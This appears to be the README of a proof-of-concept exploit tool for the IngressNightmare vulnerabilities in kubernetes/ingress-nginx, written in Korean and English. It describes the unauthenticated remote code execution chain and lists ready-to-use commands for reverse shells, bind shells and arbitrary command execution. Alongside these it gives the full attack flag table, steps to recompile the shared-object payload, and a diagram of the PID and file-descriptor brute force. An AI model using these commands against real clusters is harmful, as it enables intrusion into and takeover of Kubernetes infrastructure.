
IngressNightmare POC. 세계 최초의 비블라인드 원격 실행 악용으로 다중 고급 악용 방법을 사용합니다. 디스크 악용을 허용합니다. CVE-2025-24514 - auth-url 주입, CVE-2025-1097 - auth-tls-match-cn 주입, CVE-2025-1098 – mirror UID 주입 -- 모두 사용 가능.
이 취약점은 원격 공격자가 kubernetes/ingress-nginx의 영향을 받는 설치에서 임의 코드를 실행할 수 있도록 합니다. 이 취약점을 악용하기 위해 인증이 필요하지 않습니다. 특정 결함은 HTTP 요청 처리에 존재합니다.
이 취약점은 두 개의 요청을 보내서 트리거됩니다. 하나는 동일한 포드에 있는 NGINX 서버로 보내는 긴 버퍼링된 요청이며, nginx는 이를 임시 파일로 캐시합니다. 두 번째 요청은 admission validating webhook 서버로 전송되는 요청으로, admission webhook이 ssl_engine badso_location; 지시문을 포함하는 임시 nginx 구성을 작성하도록 트리거합니다. 그런 다음 admission webhook은 nginx -t를 실행하여 구성을 확인하고, 이는 NGINX 서버의 컨텍스트에서 원격 코드 실행을 트리거합니다.
# reverse shell
./ingressnightmare -m r -r ${ur_ip} -p ${port} -i ${INGRESS} -u ${UPLOADER}
# bind shell # maybe lost?
./ingressnightmare -m b -b ${port} -i ${INGRESS} -u ${UPLOADER}
# blind command execution
./ingressnightmare -m c -c 'date >> /tmp/pwn; echo eson pwn >> /tmp/pwn' -i ${INGRESS} -u ${UPLOADER}
# for CVE-2025-24514 - auth-url injection
# This is the default mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-auth-url
# same as
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER}
# for CVE-2025-1097 - auth-tls-match-cn injection,
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-match-cn --auth-secret-name ${secret_name}
# for CVE-2025-1098 – mirror UID injection -- all available
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-mirror-uid
## Advanced usage
# Send only admission request
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so # --is-auth-url # --is-match-cn # --is-mirror-uid ...
# Send only upload request loop
./ingressnightmare -m c -c "your command" -u ${UPLOADER} --only-upload
# dry run mode
## dry run to lookup payload so
./ingressnightmare -m c -c 'your command' -u ${UPLOADER} --dry-run
# dump with > /tmp/evil.so
## dry run to lookup raw nginx admission
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so --dry-run # --is-auth-url # --is-match-cn # --is-mirror-uid ...
## verbose mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -v # debug
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -vv # trace
./ingressnightmare -vv # -i ${INGRESS} -u ${UPLOADER} # -m c -c 'your command'
## if get error like Exec format error, that means the payload is not compatible with the target system.
## It maybe caused by the target system is arm64, but the payload is x86_64.
## Also the libc version and kernel version may cause this error.
## This exp Works on 5.10 kernel without libc.
## recompile c
./ingressnightmare show-c > exp.c
gcc -fPIC -nostdlib -ffreestanding -fno-builtin -o danger.so exp.c -shared
./ingresnightmare -m c -c 'your command' --so ./danger.so -i ${INGRESS} -u ${UPLOADER}
공격 플래그가 너무 복잡해서 여러 그룹으로 그룹화해야 했습니다.
[
// Set Targets Groups
{
option: "ingress-webhook-url", "i",
example: "https://ingress-nginx-controller-admission.ingress-nginx.svc.cluster.local:443",
description: "ingress webhook url"
},
{
option: "upload-url", "u",
example: "http://ingress-nginx-controller.ingress-nginx.svc.cluster.local:80",
description: "upload url"
},
// Set Exploit Method for which CVE
{
option: "is-auth-url", "a",
example: "true",
description: "CVE-2025-24514: using auth-url to attack (default)"
},
{
option: "is-match-cn", "A",
example: "false",
description: "CVE-2025-1097: using auth-tls-match-cn to attack (not default)"
},
{
option: "auth-secret-name", "U",
example: "kube-system/cilium-ca",
description: "if using auth-tls-match-cn, secret name is required, example: kube-system/cilium-ca"
},
{
option: "is-mirror-with-uid", "M",
example: "false",
description: "CVE-2025-1098: using mirror with uid"
},
// Set Exploit Mode for reverse shell / bind shell / command
{
option: "mode", "m",
example: "r",
description: "mode reverse-shell(r)/bind-shell(b)/command(c)"
},
{
option: "reverse-shell-ip", "r",
example: "192.168.1.100",
description: "reverse shell ip"
},
{
option: "reverse-shell-port", "p",
example: "4444",
description: "reverse shell port"
},
{
option: "bind-shell-port", "b",
example: "4444",
description: "bind shell port"
},
{
option: "command", "c",
example: "id",
description: "command"
},
// Debug modes
{
option: "verbose", "v",
example: "-vv",
description: "verbose output (debug is -v ; trace is -vv)"
},
{
option: "dry-run", "d",
example: "true",
description: "dry run and dump payload"
},
// test Only Upload Thread / Only Admission Thread modes
{
option: "only-admission", "o",
example: "true",
description: "only admission"
},
{
option: "only-admission-file", "f",
example: "/path/to/file",
description: "only admission file"
},
{
option: "only-upload", "O",
example: "true",
description: "only upload"
},
// Set guessed PID and FD ranges
{
option: "pid-range-start", "S",
example: "5",
description: "pid range start"
},
{
option: "pid-range-end", "E",
example: "40",
description: "distance to pid range end"
},
{
option: "fd-range-start", "s",
example: "3",
description: "fd range start"
},
{
option: "fd-range-end", "e",
example: "26",
description: "distance fd range end"
},
// Advanced Payload: custom so file or json template
{
option: "so", "",
example: "/path/to/custom.so",
description: "custom so file exploit, if u get Exec format error, please recompile the so file from c code. ps: execute `./ingressnightmare show-c` to get source code"
},
{
option: "validate-json-template", "t",
example: "template.json",
description: "validate json template, using foobar as placeholder to filepath"
}
]
https://github.com/user-attachments/assets/415d6b81-b907-4aaa-bd99-18640bd64b2b
sequenceDiagram
box EvilPod
participant hacker
end
box IngressControllerPod
participant IngressControllerAdmission
participant IngressControllerNginx
end
hacker->>IngressControllerNginx: evil.so file with fake http request length
activate IngressControllerNginx
activate hacker
hacker->>IngressControllerAdmission: admission injection (please load ../../../../../../proc/1/fd/3 )
activate IngressControllerAdmission
Note right of IngressControllerAdmission: trying to execute nginx -t -c tempXXX1.cfg
Note right of IngressControllerAdmission: nginx -t loading ssl engine /proc/1/fd/3
Note right of IngressControllerAdmission: Execute Failed, make response with stderr
IngressControllerAdmission-->> hacker: Error No such file
deactivate IngressControllerAdmission
Note left of hacker: Brute forcing the PID and fd
Note right of IngressControllerNginx: caching the request ...